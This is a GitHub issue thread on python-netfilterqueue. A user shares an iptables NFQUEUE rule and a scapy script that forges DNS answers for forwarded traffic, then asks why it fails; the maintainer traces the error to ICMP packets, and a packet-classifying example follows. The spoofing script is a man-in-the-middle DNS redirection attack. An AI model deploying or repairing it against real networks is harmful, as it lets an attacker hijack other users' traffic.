oremanj/python-netfilterqueue

IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored

pkahsan opened this issue · 2 comments

The iptables I use are:

```
iptables -I FORWARD -j NFQUEUE --queue-num 0
```

```python
import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.oldverision.com" in qname:
            print("[+] Spoofing target ")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.0.104")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            print("packet's summary: " + str(scapy_packet.summary()))
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            print("packet's summary after modify: " + str(scapy_packet.summary()))
            print(scapy_packet.show())
            print(packet.show())
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

Following is the output:

```
[+] Spoofing target
packet's summary: IP / ICMP / IPerror / UDPerror / DNS Ans "192.168.0.104"
Exception IndexError: IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored
[+] Spoofing target
packet's summary: IP / UDP / DNS Ans "192.168.0.104"
packet's summary after modify: IP / UDP / DNS Ans "192.168.0.104"
###[ IP ]###
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = None
  id        = 9623
  flags     =
  frag      = 0
  ttl       = 63
  proto     = udp
  chksum    = None
  src       = 192.168.0.1
  dst       = 192.168.0.102
  \options   \
###[ UDP ]###
     sport     = domain
     dport     = 61702
     len       = None
     chksum    = None
###[ DNS ]###
        id        = 28104
        qr        = 1
        opcode    = QUERY
        aa        = 1
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 1
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]###
         |  qname     = 'www.oldverision.com.'
         |  qtype     = A
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]###
         |  rrname    = 'www.oldverision.com.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 0
         |  rdlen     = 4
         |  rdata     = '192.168.0.104'
        ns        = None
        ar        = None
```

Following is the ping result:

```
Pinging www.oldverision.com [107.183.175.41] with 32 bytes of data:
Reply from 107.183.175.41: bytes=32 time=388ms TTL=227
Reply from 107.183.175.41: bytes=32 time=400ms TTL=227
Reply from 107.183.175.41: bytes=32 time=424ms TTL=227
```

When it says something about an exception being ignored, this usually indicates a problem in the user code, not library code. It's a Cython thing.

If I had to guess, the exception comes from your `del scapy_packet[scapy.UDP].len` line when the input is an ICMP packet, based on the output you provided where it works on UDP and fails on ICMP, and the code you provided where it seems to be assuming all input is UDP.

Even if I don't delete the length of UDP, the same error comes. But when I mention -p udp in iptables, then this exception error doesn't come. But the big problem is that when I ping the server from a remote machine, the target is still not spoofed, but the packet is modified, having rdata=redirect_ip.
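The ICMP diagnosis and the `-p udp` observation in this thread both come down to the outer IP protocol: an ICMP error quotes the original UDP/DNS datagram in its body, so a DNS record can be dissected from a packet that has no UDP layer of its own. The following is an added example, not code from this thread or from the netfilterqueue project; it uses only the standard library, the helper names are hypothetical, and the sample packets are constructed (a destination-unreachable error is assumed as the ICMP type).

```python
import socket
import struct

ICMP, UDP = 1, 17
# ICMP types whose body quotes the offending packet's IP header + leading bytes
ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}

def ipv4_header(raw):
    """Return (protocol, header_length) for an IPv4 header, or None if malformed."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        return None
    return raw[9], ihl

def classify(raw):
    """Name the outer transport of a queued IPv4 packet (what NFQUEUE hands over)."""
    hdr = ipv4_header(raw)
    if hdr is None:
        return "malformed"
    proto, ihl = hdr
    if len(raw) < ihl + 8 and proto in (ICMP, UDP):
        return "malformed"
    if proto == UDP:
        return "udp"
    if proto == ICMP:
        inner = ipv4_header(raw[ihl + 8:]) if raw[ihl] in ICMP_ERROR_TYPES else None
        # A quoted UDP/DNS datagram is payload of the ICMP error, not a UDP layer.
        return "icmp-error-quoting-udp" if inner and inner[0] == UDP else "icmp"
    return "other"

def build_ip(proto, payload, src, dst):
    """Constructed sample packet; checksums stay 0 because nothing here verifies them."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst)) + payload

# Constructed samples using the addresses and ports shown in the issue output.
DNS_BODY = struct.pack("!HHHHHH", 28104, 0x8580, 0, 0, 0, 0)  # bare DNS header, no records
DNS_REPLY = build_ip(UDP, struct.pack("!HHHH", 53, 61702, 8 + len(DNS_BODY), 0) + DNS_BODY,
                     "192.168.0.1", "192.168.0.102")
PORT_UNREACHABLE = build_ip(ICMP, struct.pack("!BBHI", 3, 3, 0, 0) + DNS_REPLY,
                            "192.168.0.102", "192.168.0.1")
ECHO_REQUEST = build_ip(ICMP, struct.pack("!BBHHH", 8, 0, 0, 1, 1),
                        "192.168.0.102", "192.168.0.1")

if __name__ == "__main__":
    for name in ("DNS_REPLY", "PORT_UNREACHABLE", "ECHO_REQUEST"):
        print(name, "->", classify(globals()[name]))
```

A rule restricted with `-p udp` never queues the ICMP case at all, which matches the exception disappearing once that match is added.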